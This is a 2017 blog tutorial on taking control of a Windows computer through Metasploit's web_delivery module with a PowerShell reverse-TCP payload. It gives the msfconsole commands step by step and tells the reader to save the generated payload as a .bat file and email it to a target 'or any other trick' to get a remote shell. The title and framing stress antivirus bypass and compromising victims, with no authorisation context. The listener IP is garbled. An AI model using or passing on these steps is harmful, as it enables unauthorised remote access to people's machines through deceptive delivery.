Saturday, 15 July 2017

Hack Windows Powershell By Metasploit | Web Delivery | Bypass Anti-Virus Protection

The growth of Metasploit has increased over the years and has become rather popular among hackers, script kiddies, penetration testers, cyber security analysts, and information security engineers. The fact that it is open source is a reason for it’s popularity.
Metasploit can be used to test for a number of different security vulnerabilities and is well known for its evasion and anti-forensic tools. This article will be focusing on a single technique which we will call the Metasploit Powershell Shellcode Injector Hack or simply Web Delivery.

If you are beginner to metasploit  check here what is metasploit 

Although the web delivery exploit will work on Windows systems that have Python installed, few Windows systems actually have Python installed while nearly ever UNIX, Linux, and OS X has Python installed by default. Fortunately, those Windows systems do have PowerShell installed by default, and we can use it with Metasploit's web delivery exploit to take control of those systems.
In this tutorial, we will use Metasploit's web delivery exploit to take control of a Windows system through its PowerShell.

The idea behind this attack is to setup a payload listener that receives incoming connections from Windows based systems. Then run the payload handler and wait for incoming connections after the powershell code has been delivered to the target user. When the target user executes that file a remote session is opened. There are many ways to deliver the powershell code to the target user but we won’t be getting into that. Keep in mind that you will need to be on the same network as your target user.

 STEP 1: Fire up your Kali Linux and burn Metasploit .

kali > msfconsole

 STEP 2: Loading the Web Delivery Exploit
Like already mentioned above, using Metasploit's web delivery is very similar to web delivery on Unix, Linux, and OS X systems except that Windows systems don't have Python installed by default. But they do have Windows PowerShell, and there is a web delivery module for that.
Let's load the web delivery exploit in Metasploit:

msf > use exploit/multi/script/web_delivery
 msf > set LHOST 192.1681.153

msf > set LPORT 4444
msf > set URIPATH powersploit

STEP 3:Set the Target to PowerShell

By default, the web delivery exploit in Metasploit uses Python scripts. To use the Windows-based PowerShell option, we need to set the target to 2.
msf > set target 2
With the target set to 2, Metasploit will create a PowerShell script when we are ready to exploit.

STEP 4:Set the Payload

Lastly, we need to set the payload. Let's use the windows/powershell_reverse_tcp payload.
msf > set payload windows/powershell_reverse_tcp

 Now, we can type exploit and Metasploit will start a small web server in the background and generate a command for us to use on the Windows system.

 As you see in this image you have to run this command in our target machine
copy this command and paste in notepad and save as .bat file  and send by mail or any other trick.

After execute you have complete  excess to powershell of windows .

type session -i to check available sessions and session -i 1 to select 1st computer ....
You can now type any powershell command .

No comments:

Post a Comment